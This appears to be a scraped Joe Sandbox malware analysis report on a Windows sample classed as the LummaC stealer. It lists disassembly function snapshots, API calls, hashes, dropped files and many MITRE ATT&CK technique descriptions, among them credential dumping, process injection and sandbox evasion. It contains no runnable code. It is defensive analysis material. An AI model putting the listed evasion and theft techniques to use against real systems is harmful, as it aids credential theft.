Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52b2ed547ed486bf70db5b130c6f96ab0e47e3d288393230a4583fede495ba8f
Instruction ID: 33dfd82f669cd8f8d1c5ece5b094b083f1dacac1328a3f3c51d4b5475c322cb4
Opcode Fuzzy Hash: 52b2ed547ed486bf70db5b130c6f96ab0e47e3d288393230a4583fede495ba8f
Instruction Fuzzy Hash: BB417774608341AFD708CF18C9647ABB7E2BBC5708F54881EE085CB350D739DD499B8A

Uniqueness

Uniqueness Score: -1.00%

Function 0041532F Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004153F8
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00415432

Strings

qrs, xrefs: 00415467
2M#O, xrefs: 00415452

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 2M#O$qrs
API String ID: 237503144-459089353
Opcode ID: 5738a6080e53d9c27d0467a7ed8f4ad6aedcc94e31669a003e93a1db2269e90d
Instruction ID: 5d37128eb655b3ce20a42dc0b2209041e1bff3de006584d691c102648eca53ad
Opcode Fuzzy Hash: 5738a6080e53d9c27d0467a7ed8f4ad6aedcc94e31669a003e93a1db2269e90d
Instruction Fuzzy Hash: B57158B4500B009FD760CF29C882BA3BBF5FF49314F504A1DE9AA8B795D735A841CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041E470 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 211
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041E566
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041E591

Strings

y({, xrefs: 0041E61E
\], xrefs: 0041E4BB

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: y({$\]
API String ID: 237503144-1680756300
Opcode ID: 4016d214ae19f130483f60120c0717f67e428fb3cd0891b68a6b2cec0c2568cf
Instruction ID: e25ed9a0d22e0f3fa8b9468e904468c6ca1dcb30bdbe49a1f7d17ff22c7d632e
Opcode Fuzzy Hash: 4016d214ae19f130483f60120c0717f67e428fb3cd0891b68a6b2cec0c2568cf
Instruction Fuzzy Hash: D261BA742083518FD328CF15C890BABB7E1EFC6318F514A1DE8DA5B281D7789945CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 0040941E

Strings

often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs, xrefs: 004093DF

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID: ExitProcess
String ID: often in other is that on their similarity resemblance system or of on replacements the reflection used ways or it internet. uses play of spellings primarily eleet leetspeak, the character via modified a glyphs
API String ID: 621844428-3137510881
Opcode ID: a8c7a0608feffd7e2e1749c64375a48e5715b8f922a8f0850a98999bbe0acf28
Instruction ID: 71acf15c079a09033e6523db7e53c771a7b60f6eae36fe439012784ceb51188a
Opcode Fuzzy Hash: a8c7a0608feffd7e2e1749c64375a48e5715b8f922a8f0850a98999bbe0acf28
Instruction Fuzzy Hash: 18F0C8B181C210D6CA007B75560B16E3B689F54358F10523FEC91721C3EA3C4C57969F

Uniqueness

Uniqueness Score: -1.00%

Function 0043720F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE ref: 004372B0

Strings

J:Yd, xrefs: 004372C9

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID: LibraryLoad
String ID: J:Yd
API String ID: 1029625771-3719775327
Opcode ID: 42819a44a75bad02ac78ae3f52bda18cf707d067c69807472c7a47606a468e13
Instruction ID: 9f72ab8e6fef7ab5f9b151b5c9916c5e07f45c06a0242e1f5c23e53643bd5669
Opcode Fuzzy Hash: 42819a44a75bad02ac78ae3f52bda18cf707d067c69807472c7a47606a468e13
Instruction Fuzzy Hash: 24115BB41197429BD708DF15D9A072FBBE2BBC6708F148A2DE08657784D734C905DB4A

Uniqueness

Uniqueness Score: -1.00%

Function 00418420 Relevance: 3.1, APIs: 2, Instructions: 64COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 0041845A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00418488

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 509dd70af5cfacdc163e6a3cd6351ac216e57ee298d06cb2303148d3d0430dd4
Instruction ID: c439fc60375e19190895b0dfc784fe59a333b8c0865af61074213a66c212d99e
Opcode Fuzzy Hash: 509dd70af5cfacdc163e6a3cd6351ac216e57ee298d06cb2303148d3d0430dd4
Instruction Fuzzy Hash: 110122754006057BD210AB14CC86FB737ACEB86768F44021CFE65872D0EA70A9448AB6

Uniqueness

Uniqueness Score: -1.00%

Function 004261A5 Relevance: 1.9, APIs: 1, Instructions: 441COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2497332581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 044b7e4f182fca21c46b655c38835ddba2875bee4ceb756e0e76a7714cc3c112
Instruction ID: 40de058446f40d6ec47dcc6b66d3ef7984a9777a8e2b065fc7a1cf1a353d17a1
Opcode Fuzzy Hash: 044b7e4f182fca21c46b655c38835ddba2875bee4ceb756e0e76a7714cc3c112
Instruction Fuzzy Hash: 86F15C70604B928BE726CF35C0687E7BBE1BB56308F44496DC4EB8B792C779A406CB54

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 2M1NS61GG8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Desktop\Google Chrome.lnk

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\2M1NS61GG8.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Local\Temp\TmpE8B6.tmp

C:\Users\user\AppData\Local\Temp\TmpE8D6.tmp

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\76b53b3ec448f7ccdda2063b15d2bfc3_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
2M1NS61GG8.exe

Function 083D7BF0 Relevance: 6.9, Strings: 5, Instructions: 626
COMMON

Function 08D160B0 Relevance: 5.3, Strings: 4, Instructions: 263
COMMON

Function 08D16007 Relevance: 4.1, Strings: 3, Instructions: 357
COMMON

Function 08D16061 Relevance: 4.0, Strings: 3, Instructions: 299
COMMON

Function 02F74A68 Relevance: 3.9, Strings: 3, Instructions: 142
COMMON

Function 0E74F750 Relevance: 3.9, Strings: 3, Instructions: 137
COMMON

Function 02F7414B Relevance: 2.7, Strings: 2, Instructions: 247
COMMON

Function 08D10DE8 Relevance: 2.7, Strings: 2, Instructions: 237
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre